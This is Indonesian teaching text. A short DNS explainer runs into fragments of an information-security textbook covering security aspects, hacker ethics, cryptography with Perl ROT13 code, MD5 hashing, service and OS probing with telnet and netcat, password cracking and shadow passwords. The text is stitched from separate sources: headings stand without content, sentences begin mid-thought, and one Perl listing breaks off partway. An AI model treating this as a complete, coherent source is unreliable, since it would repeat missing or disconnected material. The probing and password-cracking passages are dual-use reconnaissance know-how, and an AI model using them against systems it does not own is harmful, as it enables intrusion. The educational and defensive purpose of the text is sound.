Domain Name System (DNS) adalah distribute database system yang digunakan untuk pencarian nama
komputer (name resolution) di jaringan yang mengunakan TCP/IP (Transmission Control
Protocol/Internet Protocol). DNS biasa digunakan pada aplikasi yang terhubung ke Internet seperti web
browser atau e-mail, dimana DNS membantu memetakan host name sebuah komputer ke IP address.
Selain digunakan di Internet, DNS juga dapat di implementasikan ke private network atau intranet
dimana DNS memiliki keunggulan seperti:
1. Mudah, DNS sangat mudah karena user tidak lagi direpotkan untuk mengingat IP address
sebuah komputer cukup host name (nama Komputer).
2. Konsisten, IP address sebuah komputer bisa berubah tapi host name tidak berubah.
3. Simple, user hanya menggunakan satu nama domain untuk mencari baik di Internet maupun di
Intranet.
DNS dapat disamakan fungsinya dengan buku telepon. Dimana setiap komputer di jaringan Internet
memiliki host name (nama komputer) dan Internet Protocol (IP) address. Secara umum, setiap client
yang akan mengkoneksikan komputer yang satu ke komputer yang lain, akan menggunakan host name.
Lalu komputer anda akan menghubungi DNS server untuk mencek host name yang anda minta tersebut
berapa IP address-nya. IP address ini yang digunakan untuk mengkoneksikan komputer anda dengan
komputer lainnya.
Domain Name Space merupakan sebuah hirarki pengelompokan domain berdasarkan nama, yang terbagi
menjadi beberapa bagian diantaranya:
Root-Level Domains
Domain ditentukan berdasarkan tingkatan kemampuan yang ada di struktur hirarki yang disebut dengan
level. Level paling atas di hirarki disebut dengan root domain. Root domain di ekspresikan berdasarkan
periode dimana lambang untuk root domain adalah (“.”).
Top-Level Domains
Pada bagian dibawah ini adalah contoh dari top-level domains:
Host Names
Domain name yang digunakan dengan host name akan menciptakan fully qualified domain name
(FQDN) untuk setiap komputer. Sebagai contoh, jika terdapat fileserver1.detik.com, dimana fileserver1
adalah host name dan detik.com adalah domain name.
Fungsi dari DNS adalah menerjemahkan nama komputer ke IP address (memetakan). Client DNS disebut
dengan resolvers dan DNS server disebut dengan name servers. Resolvers atau client mengirimkan
permintaan ke name server berupa queries. Name server akan memproses dengan cara mencek ke local
database DNS, menghubungi name server lainnya atau akan mengirimkan message failure jika ternyata
permintaan dari client tidak ditemukan.
Proses tersebut disebut dengan Forward Lookup Query, yaitu permintaan dari client dengan cara
memetakan nama komputer (host) ke IP address.
1. Resolvers mengirimkan queries ke name server
2. Name server mencek ke local database, atau menghubungi name server lainnya, jika ditemukan
akan diberitahukan ke resolvers jika tidak akan mengirimkan failure message
3. Resolvers menghubungi host yang dituju dengan menggunakan IP address yang diberikan name
server
Kesimpulan
DNS adalah hasil pengembangan dari metode pencarian host name terhadap IP address di Internet.
Pada DNS client (resolver) mengirimkan queries ke Name Server (DNS). Name Server akan menerima
permintaan dan memetakan nama komputer ke IP address Domain Name Space adalah pengelompokan
secara hirarki yang terbagi atas root-level domains, top-level domains, second-level domains, dan host
names.
Keamanan SI Berbasis Internet
Keamanan dan management perusahaan
Beberapa Statistik Sistem Keamanan
Masalah keamanan yang berhubungan dengan
Indonesia
Meningkatnya Kejahatan Komputer
Klasifikasi Kejahatan Komputer
Aspek / servis dari security
Privacy / Confidentiality
Integrity
Authentication
Availability
Access Control
Non-repudiation
Serangan Terhadap Keamanan Sistem
Informasi
Electronic commerce: mengapa sistem informasi
berbasis Internet
Statistik Internet
Statistik Electronic Commerce
Keamanan Sistem Internet
Hackers, Crackers, dan Etika
Hackers vs crackers
Interpretasi Etika Komputasi
Hackers dan crackers Indonesia
Mengamankan Sistem
Informasi
Mengatur akses (Access Control)
Password di sistem UNIX
Shadow Password
Memilih password
Menutup servis yang tidak digunakan
Memasang Proteksi
Firewall
Pemantau adanya serangan
Pemantau integritas sistem
Audit: Mengamati Berkas Log
Backup secara rutin
Penggunaan Enkripsi untuk meningkatkan
keamanan
Telnet atau shell aman
Eksploitasi Keamananan
Mencari informasi
Host, Whois, dig
Sam Spade, utility untuk MS Windows
Eksploitasi Web Server
Defacing Microsoft IIS
Denial of Service Attack
Land attack
Latierra
Ping-o-death
Ping broadcast (smurf)
Contoh-contoh DoS attack lainnya
Sniffer
Sniffit
tcpdump
Sniffer Pro
Anti Sniffer
Trojan Horse
Back Orifice (BO)
Mendeteksi BO
NetBus
Referensi
Daftar Bahan Bacaan
Sumber informasi dan organisasi yang
berhubungan dengan keamanan sistem
informasi
Daftar perusahaan yang berhubungan dengan
keamanan
Sumber software / tools
Pendahuluan
Masalah keamanan merupakan salah satu aspek penting dari sebuah sistem
informasi. Sayang sekali masalah keamanan ini sering kali kurang
mendapat perhatian dari para pemilik dan pengelola sistem informasi.
Seringkali masalah keamanan berada di urutan kedua, atau bahkan di urutan
terakhir dalam daftar hal-hal yang dianggap penting. Apabila menggangu
performansi dari sistem, seringkali keamanan dikurangi atau ditiadakan [9].
Buku ini diharapkan dapat memberikan gambaran dan informasi
menyeluruh tentang keamanan sistem informasi dan dapat membantu para
pemilik dan pengelola sistem informasi dalam mengamankan informasinya.
Informasi saat ini sudah menjadi sebuah komoditi yang sangat penting.
Bahkan ada yang mengatakan bahwa kita sudah berada di sebuah
“information-based society”. Kemampuan untuk mengakses dan
menyediakan informasi secara cepat dan akurat menjadi sangat esensial
bagi sebuah organisasi, baik yang berupa organisasi komersial
(perusahaan), perguruan tinggi, lembaga pemerintahan, maupun individual
Pendahuluan
Keamanan itu tidak dapat muncul demikian saja. Dia harus direncanakan.
Ambil contoh berikut. Jika kita membangun sebuah rumah, maka pintu
rumah kita harus dilengkapi dengan kunci pintu. Jika kita terlupa
memasukkan kunci pintu pada budget perencanaan rumah, maka kita akan
dikagetkan bahwa ternyata harus keluar dana untuk menjaga keamanan.
Kalau rumah kita hanya memiliki satu atau dua pintu, mungkin dampak dari
budget tidak seberapa. Bayangkan bila kita mendesain sebuah hotel dengan
200 kamar dan lupa membudgetkan kunci pintu. Dampaknya sangat besar.
Demikian pula di sisi pengamanan sebuah sistem informasi. Jika tidak kita
budgetkan di awal, kita akan dikagetkan dengan kebutuhan akan adanya
perangkat pengamanan (firewall, Intrusion Detection System, anti virus,
Dissaster Recovery Center, dan seterusnya).
Meskipun sering terlihat sebagai besaran yang tidak dapat langsung diukur
dengan uang (intangible), keamanan sebuah sistem informasi sebetulnya
dapat diukur dengan besaran yang dapat diukur dengan uang (tangible).
Dengan adanya ukuran yang terlihat, mudah-mudahan pihak management
dapat mengerti pentingnya investasi di bidang keamanan. Berikut ini adalah
berapa contoh kegiatan yang dapat anda lakukan:
• Hitung kerugian apabila sistem informasi anda tidak bekerja selama 1
jam, selama 1 hari, 1 minggu, dan 1 bulan. (Sebagai perbandingkan,
bayangkan jika server Amazon.com tidak dapat diakses selama beberapa
hari. Setiap harinya dia dapat menderita kerugian beberapa juta dolar.)
• Hitung kerugian apabila ada kesalahan informasi (data) pada sistem
informasi anda. Misalnya web site anda mengumumkan harga sebuah
barang yang berbeda dengan harga yang ada di toko anda.
• Hitung kerugian apabila ada data yang hilang, misalnya berapa kerugian
yang diderita apabila daftar pelanggan dan invoice hilang dari sistem
anda. Berapa biaya yang dibutuhkan untuk rekonstruksi data.
• Apakah nama baik perusahaan anda merupakan sebuah hal yang harus
dilindungi? Bayangkan bila sebuah bank terkenal dengan rentannya
pengamanan data-datanya, bolak-balik terjadi security incidents.
Tentunya banyak nasabah yang pindah ke bank lain karena takut akan
keamanan uangnya.
1. http://www.securityfocus.com/vdb/stats.html
2. http://cve.mitre.org
1. http://www.wartaekonomi.com
2. Carder adalah pencuri yang membobol kartu kredit milik orang lain.
1. Masih ingat dalam benak saya program wordprocessor yang bernama Wordstar yang
muat dalam satu disket, dan dijalankan di komputer Apple ][ yang memiliki memory
(RAM)hanya beberapa kiloBytes. Microsoft Word saat ini harus diinstal dengan meng-
gunakan CD-ROM dan membutuhkan komputer dengan RAM MegaBytes. Demikian
pula dengan spreadsheet Visicalc yang muat dalam satu disket (360 kBytes). Apakah
peningkatan kompleksitas ini memang benar-benar dibutuhkan?
Privacy / Confidentiality
Inti utama aspek privacy atau confidentiality adalah usaha untuk menjaga
informasi dari orang yang tidak berhak mengakses. Privacy lebih kearah
data-data yang sifatnya privat sedangkan confidentiality biasanya
berhubungan dengan data yang diberikan ke pihak lain untuk keperluan
tertentu (misalnya sebagai bagian dari pendaftaran sebuah servis) dan hanya
diperbolehkan untuk keperluan tertentu tersebut. Contoh hal yang
berhubungan dengan privacy adalah e-mail seorang pemakai (user) tidak
boleh dibaca oleh administrator. Contoh confidential information adalah
data-data yang sifatnya pribadi (seperti nama, tempat tanggal lahir, social
security number, agama, status perkawinan, penyakit yang pernah diderita,
nomor kartu kredit, dan sebagainya) merupakan data-data yang ingin
diproteksi penggunaan dan penyebarannya. Contoh lain dari confidentiality
adalah daftar pelanggan dari sebuah Internet Service Provider (ISP).
saya adalah anda dan akan menutup kartu kredit anda. Masih banyak lagi
kekacauan yang dapat ditimbulkan bila data-data pribadi ini digunakan oleh
orang yang tidak berhak.
Informasi mengenai privacy yang lebih rinci dapat diperoleh dari situs
Electronic Privacy Information Center (EPIC)1 dan Electronic Frontier
Foundation (EFF)2.
1. http://www.epic.org
2. http://www.eff.org
Integrity
Aspek ini menekankan bahwa informasi tidak boleh diubah tanpa seijin
pemilik informasi. Adanya virus, trojan horse, atau pemakai lain yang
mengubah informasi tanpa ijin merupakan contoh masalah yang harus
dihadapi. Sebuah e-mail dapat saja “ditangkap” (intercept) di tengah jalan,
diubah isinya (altered, tampered, modified), kemudian diteruskan ke alamat
yang dituju. Dengan kata lain, integritas dari informasi sudah tidak terjaga.
Penggunaan enkripsi dan digital signature, misalnya, dapat mengatasi
masalah ini.
Salah satu contoh kasus trojan horse adalah distribusi paket program TCP
Wrapper (yaitu program populer yang dapat digunakan untuk mengatur dan
membatasi akses TCP/IP) yang dimodifikasi oleh orang yang tidak
bertanggung jawab. Jika anda memasang program yang berisi trojan horse
tersebut, maka ketika anda merakit (compile) program tersebut, dia akan
mengirimkan eMail kepada orang tertentu yang kemudian memperbolehkan
dia masuk ke sistem anda. Informasi ini berasal dari CERT Advisory, “CA-
99-01 Trojan-TCP-Wrappers” yang didistribusikan 21 Januari 1999.
Contoh serangan lain adalah yang disebut “man in the middle attack”
dimana seseorang menempatkan diri di tengah pembicaraan dan menyamar
sebagai orang lain.
Authentication
Aspek ini berhubungan dengan metoda untuk menyatakan bahwa informasi
betul-betul asli, orang yang mengakses atau memberikan informasi adalah
betul-betul orang yang dimaksud, atau server yang kita hubungi adalah
betul-betul server yang asli.
biometric (ciri-ciri khas orang), dan sejenisnya. Ada tiga hal yang dapat
ditanyakan kepada orang untuk menguji siapa dia:
• What you have (misalnya kartu ATM)
• What you know (misalnya PIN atau password)
• What you are (misalnya sidik jari, biometric)
Availability
Aspek availability atau ketersediaan berhubungan dengan ketersediaan
informasi ketika dibutuhkan. Sistem informasi yang diserang atau dijebol
dapat menghambat atau meniadakan akses ke informasi. Contoh hambatan
adalah serangan yang sering disebut dengan “denial of service attack” (DoS
attack), dimana server dikirimi permintaan (biasanya palsu) yang bertubi-
tubi atau permintaan yang diluar perkiraan sehingga tidak dapat melayani
permintaan lain atau bahkan sampai down, hang, crash. Contoh lain adalah
adanya mailbomb, dimana seorang pemakai dikirimi e-mail bertubi-tubi
(katakan ribuan e-mail) dengan ukuran yang besar sehingga sang pemakai
tidak dapat membuka e-mailnya atau kesulitan mengakses e-mailnya
(apalagi jika akses dilakukan melalui saluran telepon). Bayangkan apabila
anda dikirimi 5000 email dan anda harus mengambil (download) email
tersebut melalui telepon dari rumah.
Access Control
Aspek ini berhubungan dengan cara pengaturan akses kepada informasi.
Hal ini biasanya berhubungan dengan klasifikasi data (public, private,
confidential, top secret) & user (guest, admin, top manager, dsb.),
mekanisme authentication dan juga privacy. Access control seringkali
dilakukan dengan menggunakan kombinasi userid/password atau dengan
menggunakan mekanisme lain (seperti kartu, biometrics).
Non-repudiation
Aspek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan
sebuah transaksi. Sebagai contoh, seseorang yang mengirimkan email untuk
memesan barang tidak dapat menyangkal bahwa dia telah mengirimkan
email tersebut. Aspek ini sangat penting dalam hal electronic commerce.
Penggunaan digital signature, certifiates, dan teknologi kriptografi secara
umum dapat menjaga aspek ini. Akan tetapi hal ini masih harus didukung
oleh hukum sehingga status dari digital signature itu jelas legal. Hal ini
akan dibahas lebih rinci pada bagian tersendiri.
Selain alasan di atas, saat ini Internet merupakan media yang paling
ekonomis untuk digunakan sebagai basis sistem informasi. Hubungan antar
komputer di Internet dilakukan dengan menghubungkan diri ke link
terdekat, sehingga hubungan fisik biasanya bersifat lokal. Perangkat lunak
(tools) untuk menyediakan sistem informasi berbasis Internet (dalam bentuk
server web, ftp, gopher), membuat informasi (HTML editor), dan untuk
mengakses informasi (web browser) banyak tersedia. Perangkat lunak ini
banyak yang tersedia secara murah dan bahkan gratis.
Statistik Internet
Jumlah komputer, server, atau lebih sering disebut host yang terdapat di
Internet menaik dengan angka yang fantastis. Sejak tahun 1985 sampai
dengan tahun 1997 tingkat perkembangannya (growth rate) jumlah host
setiap tahunnya adalah 2,176. Jadi setiap tahun jumlah host meningkat lebih
dari dua kali. Pada saat naskah ini ditulis (akhir tahun 1999), growth rate
sudah turun menjadi 1,5.
1. http://www.mids.org
Hackers are like kids putting a 10 pence piece on a railway line to see if the train
can bend it, not realising that they risk de-railing the whole train
(Mike Jones: London interview).
Hackers vs crackers
HACKER. noun. 1. A person who enjoys learning the details of computer systems
and how to stretch their capabilities - as opposed to most users of computers, who
prefer to learn only the minimum amount necessary. 2. One who programs enthusi-
astically or who enjoys programming rather than theorizing about programming.
(Guy L. Steele, et al., The Hacker’s Dictionary)
hacker /n./
[originally, someone who makes furniture with an axe] 1. A person who enjoys
exploring the details of programmable systems and how to stretch their capabili-
ties, as opposed to most users, who prefer to learn only the minimum necessary. 2.
One who programs enthusiastically (even obsessively) or who enjoys program-
ming rather than just theorizing about programming. 3. A person capable of appre-
ciating hack value. 4. A person who is good at programming quickly. 5. An expert
at a particular program, or one who frequently does work using it or on it; as in `a
Unix hacker'. (Definitions 1 through 5 are correlated, and people who fit them con-
gregate.) 6. An expert or enthusiast of any kind. One might be an astronomy
hacker, for example. 7. One who enjoys the intellectual challenge of creatively
overcoming or circumventing limitations. 8. [deprecated] A malicious meddler
who tries to discover sensitive information by poking around. Hence `password
hacker', `network hacker'. The correct term for this sense is cracker.
2. A person whose uses computers for a hobby, esp. to gain unauthorized access to
data.
Istilah hackers sendiri masih belum baku karena bagi sebagian orang
hackers mempunyai konotasi positif, sedangkan bagi sebagian lain
memiliki konotasi negatif. Bagi kelompok yang pertama (old school), untuk
pelaku yang jahat biasanya disebut crackers. Batas antara hacker dan
cracker sangat tipis. Batasan ini ditentukan oleh etika. moral, dan integritas
dari pelaku sendiri. Untuk selanjutnya dalam buku ini kami akan
menggunakan kata hacker sebagai generalisir dari hacker dan cracker,
kecuali bila diindikasikan secara eksplisit.
Berdasarkan motif dari para perusak, ada yang berbasis politik, eknomi, dan
ada juga yang hanya ingin mencari ketenaran. Masalah politik nampaknya
sering menjadi alasan untuk menyerang sebuah sistem (baik di dalam
maupun di luar negeri). Beberapa contoh dari serangan yang menggunakan
alasan politik antara lain:
• Serangan dari hackers Portugal yang mengubah isi beberapa web site
milik pemerintah Indonesia dikarenakan hackers tersebut tidak setuju
dengan apa yang dilakukan oleh pemerintah Indonesia di Timor Timur.
Selain mengubah isi web site, mereka juga mencoba merusak sistem
yang ada dengan menghapus seluruh disk (jika bisa).
• Serangan dari hackers Cina dan Taiwan terhadap beberapa web site
Indonesia atas kerusuhan di Jakarta (Mei 1998) yang menyebabkan etnis
Cina di Indonesia mendapat perlakukan yang tidak adil. Hackers ini
mengubah beberapa web site Indonesia untuk menyatakan ketidak-
sukaan mereka atas apa yang telah terjadi.
• Beberapa hackers di Amerika menyatakan akan merusak sistem milik
pemerintah Iraq ketika terjeadi ketegangan politik antara Amerika dan
Irak.
Sebelum melangkah lebih jauh kepada hal yang praktis dalam pengamanan
sistem informasi, ada baiknya kita pelajari dasar-dasar (principles) dan
teori-teori yang digunakan untuk pengamanan sistem informasi.
Kriptografi, enkripsi, dan dekrtipsi (baik dengan menggunakan private-key
maupun dengan menggunakan public-key) akan dibahas di dalam bab ini.
Terminologi
Kriptografi (cryptography) merupakan ilmu dan seni untuk menjaga pesan
agar aman. (Cryptography is the art and science of keeping messages
secure. [40]) “Crypto” berarti “secret” (rahasia) dan “graphy” berarti
“writing” (tulisan) [3]. Para pelaku atau praktisi kriptografi disebut
cryptographers. Sebuah algoritma kriptografik (cryptographic algorithm),
disebut cipher, merupakan persamaan matematik yang digunakan untuk
proses enkripsi dan dekripsi. Biasanya kedua persamaan matematik (untuk
enkripsi dan dekripsi) tersebut memiliki hubungan matematis yang cukup
erat.
Enkripsi
Enkripsi digunakan untuk menyandikan data-data atau informasi sehingga
tidak dapat dibaca oleh orang yang tidak berhak. Dengan enkripsi data anda
disandikan (encrypted) dengan menggunakan sebuah kunci (key). Untuk
membuka (decrypt) data tersebut digunakan juga sebuah kunci yang dapat
sama dengan kunci untuk mengenkripsi (untuk kasus private key
cryptography) atau dengan kunci yang berbeda (untuk kasus public key
cryptography). Gambar 2.1 pada halaman 29 menunjukkan contoh proses
enkripsi dan dekripsi dengan dua kunci yang berbeda.
Secara matematis, proses atau fungsi enkripsi (E) dapat dituliskan sebagai:
E(M) = C (1)
D(C) = M (2)
masukan (karakter atau data) secara terus menerus dan menghasilkan data
pada saat yang bersamaan.
ROT13
C = ROT13 ( M ) (3)
Program dalam bahasa Perl untuk melakukan ROT13 dapat dilihat dalam
listing di bawah ini.
#! /usr/bin/perl
# rot13: rotate 13
# usageL rot13 < filename.txt
# bugs: only works with lower case
#
# Copyright 1998, Budi Rahardjo
# <rahard@paume.itb.ac.id>, <budi@vlsi.itb.ac.id>
# Electrical Engineering
# Institut Teknologi Bandung (ITB), Indonesia
#
while (<>) {
# read a line into $_
for ($i=0 ; $i < length($_) ; $i++) {
$ch = substr($_,$i,1);
# only process if it’s within a-z
# otherwise skip
if ( (ord($ch)>=97) and (ord($ch)<=122) ) {
$newch = &rot13($ch); # rotate it
printf(“%c”, $newch);
} else {
# just print character that was not processed
print $ch;
}
} # end for loop
} # done...
sub rot13 {
local($ch) = @_;
$asch = ord($ch) - 97; # get the ascii value and normalize it
$rotasch = $asch + 13; # rotate 13 it
# send it back to ascii
$rotasch = $rotasch % 26;
$rotasch = $rotasch + 97;
return($rotasch);
}
#! /usr/bin/perl
# statistik munculnya jumlah huruf
# statchar.pl < filename.txt
# bugs: only works with lower case
#
# Copyright 1998, Budi Rahardjo
# <rahard@paume.itb.ac.id>, <budi@vlsi.itb.ac.id>
# Electrical Engineering
# Institut Teknologi Bandung (ITB), Indonesia
#
while (<>) {
Frequency analysis bermanfaat jika teks yang tersedia cukup panjang. Teks
yang pendek, dengan jumlah huruf yang lebih sedikit, biasanya memiliki
deviasi dari data-data statistik munculnya huruf. Selain itu ada beberapa
kasus dimana sengaja dibuat teks yang “merusak” struktur frekuensi
tersebut. Sebagai contoh, pengarang Perancis yang bernama Georges Perec
di tahun 1969 menulis “La Disparition” (sebuah novel dengan 200
halaman) tanpa kata yang menggunakan huruf “e”. Karya ini kemudian
diterjemahkan oleh ke dalam bahasa Inggris oleh seorang pengarang Inggris
yang bernama Gilbert Adair dengan tetap tanpa menggunakan huruf “e”.
Judul terjemahannya adalah “A Void”. Cerita ini diulas dalam buku [39].
Multiple-letter encryption
Penggunaan Kunci
EK ( M ) = C (5)
DK ( M ) = M (6)
SSH digunakan untuk mengenkripsi sesion telnet ke sebuah host. Hal ini
akan dibahas lebih lanjut pada bagian lain.
Memecahkan DES
1. Cerita mengenai latar belakang munculnya Lucifer dapat dibaca pada buku Steven Levy,
“crypto” (lihat bagian referensi). Algoritma yang dikembangkan di IBM mulanya dibuat
dalam bahasa APL dengan nama “Demonstration”. Tapi karena panjang nama file tidak
boleh terlalu panjang maka nama filenya adalah “Demon” (yang di dalam bahasa Inggris
berarti hantu atau setan). Versi berikutnya menggunakan nama guyonan “Lucifer”
sebagai terusannya. Lucifer sendiri sebetulnya nama setan di dalam bahasa Inggris.
1. Sembilan hari sama dengan 777.600 detik. Jika angka tersebut dibagi dengan 65.536
maka hasilnya adalah sekitar 12 detik.
Perlu diingat bahwa group seperti EFF merupakan group kecil dengan
budget yang terbatas. Dapat dibayangkan sistem yang dimiliki oleh
National Security Agency (NSA) dari pemerintah Amerika Serikat1.
Tentunya mereka dapat memecahkan DES dengan lebih cepat.
Banyak sudah buku, artikel yang memuat informasi tentang DES. Bagi anda
yang berminat untuk mempelajari DES lebih lanjut, silahkan mengunakan
referensi [11, 13, 24, 27, 37 - Chapter 12].
Hash function merupakan fungsi yang bersifat satu arah dimana jika kita
masukkan data, maka dia akan menghasilkan sebuah “checksum” atau
“fingerprint” dari data tersebut. Ada beberapa hash function yang umum
digunakan, antara lain:
• MD5
• SHA
fungsi
160f2af453b234
hash
Contoh latihan di atas dapat dijalankan pada sistem UNIX yang memiliki
program “md5” (atau program “md5sum”1) seperti di bawah ini.
unix% echo ‘Saya pesan 10 buah komputer.’ | md5
5F736F18556E3B8D90E50299C7345035
unix% echo ‘Saya pesan 11 buah komputer.’ | md5
9CB9AD1A369512C96C74236B959780D3
1. Source code MD5 dapat diperoleh di berbagai tempat seperti antara lain di Anonymous
FTP site <ftp://www.paume.itb.ac.id/pub/security>
Apabila anda telah memiliki sebuah sistem informasi, bab ini akan
membantu anda untuk mengevaluasi keamanan sistem informasi yang anda
miliki.
Salah Disain
Contoh sistem yang lemah disainnya adalah algoritma enkripsi ROT13 atau
Caesar cipher, dimana karakter digeser 13 huruf atau 3 huruf. Meskipun
diimplementasikan dengan programming yang sangat teliti, siapapun yang
mengetahui algoritmanya dapat memecahkan enkripsi tersebut.
Mekanisme ini digunakan oleh program nmap dan queso untuk mendeteksi
operating system (OS) dari sebuah sistem, yang disebut fingerprinting.
Contoh dan informasi yang lebih lengkap mengenai masalah kelemahan
protokol TCP/IP dapat dilihat pada referensi [2].
Contoh lain sumber lubang keamanan yang disebabkan oleh kurang baiknya
implementasi adalah kealpaan memfilter karakter-karakter yang aneh-aneh
yang dimasukkan sebagai input dari sebuah program (misalnya input dari
CGI-script2) sehingga sang program dapat mengakses berkas atau informasi
yang semestinya tidak boleh diakses.
Salah konfigurasi
Kesalahan yang sama juga sering terjadi di sistem yang berbasis MS-DOS.
Karena sudah mengantuk, misalnya, ingin melihat daftar berkas di sebuah
direktori dengan memberikan perintah “dir *.*” ternyata salah memberikan
perintah menjadi “del *.*” (yang juga menghapus seluruh file di direktori
tersebut).
• Cops
• Tripwire
• Satan/Saint
• SBScan: localhost security scanner
Probing Services
Servis di Internet umumnya dilakukan dengan menggunakan protokol TCP
atau UDP. Setiap servis dijalankan dengan menggunakan port yang berbeda,
misalnya:
• SMTP, untuk mengirim dan menerima e-mail, TCP, port 25
• DNS, untuk domain, UDP dan TCP, port 53
• HTTP, web server, TCP, port 80
• POP3, untuk mengambil e-mail, TCP, port 110
Contoh di atas hanya sebagian dari servis yang tersedia. Di sistem UNIX,
lihat berkas /etc/services dan /etc/inetd.conf untuk melihat servis
apa saja yang dijalankan oleh server atau komputer yang bersangkutan.
Berkas /etc/services berisi daftar servis dan portnya, sementara berkas /etc/
inetd.conf berisi servis-servis yang di jalan di server UNIX tersebut. Jadi
tidak semua servis dijalankan, hanya servis yang dibuka di /etc/inetd.conf
saja yang dijalankan. Selain itu ada juga servis yang dijalankan tidak
melalui inetd.conf melainkan dijalankan sebagai daemon yang berjalan di
belakang layar.
unix% more /etc/services
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users
daytime 13/tcp
daytime 13/udp
netstat 15/tcp
qotd 17/tcp quote
msp 18/tcp # message send
protocol
msp 18/udp # message send
protocol
chargen 19/tcp ttytst source
chargen 19/udp ttytst source
ftp-data 20/tcp
ftp 21/tcp
fsp 21/udp fspd
Untuk beberapa servis yang berbasis TCP/IP, proses probe dapat dilakukan
dengan menggunakan program telnet. Misalnya untuk melihat apakah ada
servis e-mail dengan menggunakan SMTP digunakan telnet ke port 25.
unix% telnet target.host.com 25
Trying 127.0.0.1...
Connected to target.host.com.
Escape character is '^]'.
220 dma-baru ESMTP Sendmail 8.9.0/8.8.5; Mon, 22 Jun 1998 10:18:54 +0700
Dalam contoh di atas terlihat bahwa ada servis SMTP di server tersebut
dengan menggunakan program Sendmail versi 8.9.0. Adanya informasi
tentang sistem yang digunakan ini sebetulnya sangat tidak disarankan
karena dengan mudah orang dapat mengetahui kebocoran sistem (jika
software dengan versi tersebut memiliki lubang keamanan).
Untuk servis lain, seperti POP atau POP3 dapat dilakukan dengan cara yang
sama dengan menggunakan nomor “port” yang sesuai dengan servis yang
diamati.
unix% telnet localhost 110
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
+OK QPOP (version 2.2) at dma-baru.paume.itb.ac.id starting.
+<20651.898485542@dma-baru.paume.itb.ac.id>
quit
+OK Pop server at dma-baru.paume.itb.ac.id signing off.
Connection closed by foreign host.
Mendeteksi Probling
Selain itu, ada juga program untuk memonitor probe seperti paket program
courtney, portsentry dan tcplogd.
OS fingerprinting
Mengetahui operating system (OS) dari target yang akan diserang
merupakan salah satu pekerjaan yang dilakukan oleh seorang cracker.
Setelah mengetahui OS yang dituju, dia dapat melihat database kelemahan
sistem yang dituju. Fingerprinting merupakan istilah yang umum
digunakan untuk menganalisa OS sistem yang dituju [14].
Jika server tersebut tidak memiliki FTP server akan tetapi menjalankan Web
server, masih ada cara untuk mengetahui OS yang digunakan dengan
menggunakan program netcat (nc) seperti contoh di bawah ini (dimana
terlihat OS yang digunakan adalah Debian GNU):
$ echo -e "GET / HTTP/1.0\n\n" | nc localhost 80 | \
grep "^Server:"
Server: Apache/1.3.3 (Unix) Debian/GNU
Di sistem UNIX dan Windows NT, untuk menggunakan sebuah sistem atau
komputer, pemakai diharuskan melalui proses authentication dengan
menuliskan “userid” dan “password”. Informasi yang diberikan ini
dibandingkan dengan userid dan password yang berada di sistem. Apabila
keduanya valid, pemakai yang bersangkutan diperbolehkan menggunakan
sistem. Apabila ada yang salah, pemakai tidak dapat menggunakan sistem.
Informasi tentang kesalahan ini biasanya dicatat dalam berkas log.
Besarnya informasi yang dicatat bergantung kepada konfigurasi dari sistem
setempat. Misalnya, ada yang menuliskan informasi apabila pemakai
memasukkan userid dan password yang salah sebanyak tiga kali. Ada juga
yang langsung menuliskan informasi ke dalam berkas log meskipun baru
satu kali salah. Informasi tentang waktu kejadian juga dicatat. Selain itu asal
hubungan (connection) juga dicatat sehingga administrator dapat
memeriksa keabsahan hubungan.
Field Isi
rahard Nama atau userid pemakai
d98skjhj9l password yang sudah terenkripsi (encrypted pass-
word)
72 UID, user identification number
98 GID, group identification number
Budi Rahardjo Nama lengkap dari pemakai (sering juga disebut
GECOSa atau GCOS field)
/home/rahard home directory dari pemakai
/bin/csh shell dari pemakai
Program “password cracker” ini tidak dapat mencari tahu kata kunci dari
kata yang sudah terenkripsi. Akan tetapi, yang dilakukan oleh program ini
adalah melakukan coba-coba (brute force attack). Salah satu caranya adalah
mengambil kata dari kamus (dictionary) kemudian mengenkripsinya.
Apabila hasil enkripsi tersebut sama dengan password yang sudah
terenkripsi (encrypted password), maka kunci atau passwordnya ketemu.
Selain melakukan “lookup” dengan menggunakan kamus, biasanya
program “password cracker” tersebut memiliki beberapa algoritma
heuristic seperti menambahkan angka di belakangnya, atau membaca dari
belakang (terbalik), dan seterusnya. Inilah sebabnya jangan menggunakan
password yang terdapat dalam kamus, atau kata-kata yang umum digunakan
(seperti misalnya nama kota atau lokasi terkenal).
Shadow Password
Salah satu cara untuk mempersulit pengacau untuk mendapatkan berkas
yang berisi password (meskipun terenkripsi) adalah dengan menggunakan
“shadow password”. Mekanisme ini menggunakan berkas /etc/shadow
untuk menyimpan encrypted password, sementara kolom password di
berkas /etc/passwd berisi karakter “x”. Berkas /etc/shadow tidak
dapat dibaca secara langsung oleh pemakai biasa.
Memilih password
Dengan adanya kemungkinan password ditebak, misalnya dengan
menggunakan program password cracker, maka memilih password
memerlukan perhatian khusus. Berikut ini adalah daftar hal-hal yang
sebaiknya tidak digunakan sebagai password.
• Nama anda, nama istri / suami anda, nama anak, ataupun nama kawan.
• Nama komputer yang anda gunakan.
• Nomor telepon atau plat nomor kendaran anda.
• Tanggal lahir.
• Alamat rumah.
Latihan 10. Periksa sistem UNIX anda, servis apa saja yang
dijalankan di sana? Dari mana anda tahu servis-servis yang
dijalankan?
Servis-servis di sistem UNIX ada yang dijalankan dari “inetd” dan ada yang
dijalankan sebagai daemon. Untuk mematikan servis yang dijalankan
dengan menggunakan fasilitas inet, periksa berkas /etc/inetd.conf,
matikan servis yang tidak digunakan (dengan memberikan tanda komentar
#) dan memberitahu inetd untuk membaca berkas konfigurasinya (dengan
memberikan signal HUP kepada PID dari proses inetd).
unix# ps -aux | grep inetd
105 inetd
unix# kill -HUP 105
Untuk sistem Solaris atau yang berbasis System V, gunakan perintah “ps -
eaf” sebagai pengganti perintah “ps -aux”. Lebih jelasnya silahkan baca
manual dari perintah ps.
Untuk servis yang dijalankan sebagai daemon dan dijalankan pada waktu
startup (boot), perhatikan skrip boot dari sistem anda.
• SunOS: /etc/rc.*
• Linux Debian: /etc/init.d/*
Memasang Proteksi
Untuk lebih meningkatkan keamanan sistem informasi, proteksi dapat
ditambahkan. Proteksi ini dapat berupa filter (secara umum) dan yang lebih
spesifik adalah firewall. Filter dapat digunakan untuk memfilter e-mail,
informasi, akses, atau bahkan dalam level packet. Sebagai contoh, di sistem
UNIX ada paket program “tcpwrapper” yang dapat digunakan untuk
membatasi akses kepada servis atau aplikasi tertentu. Misalnya, servis
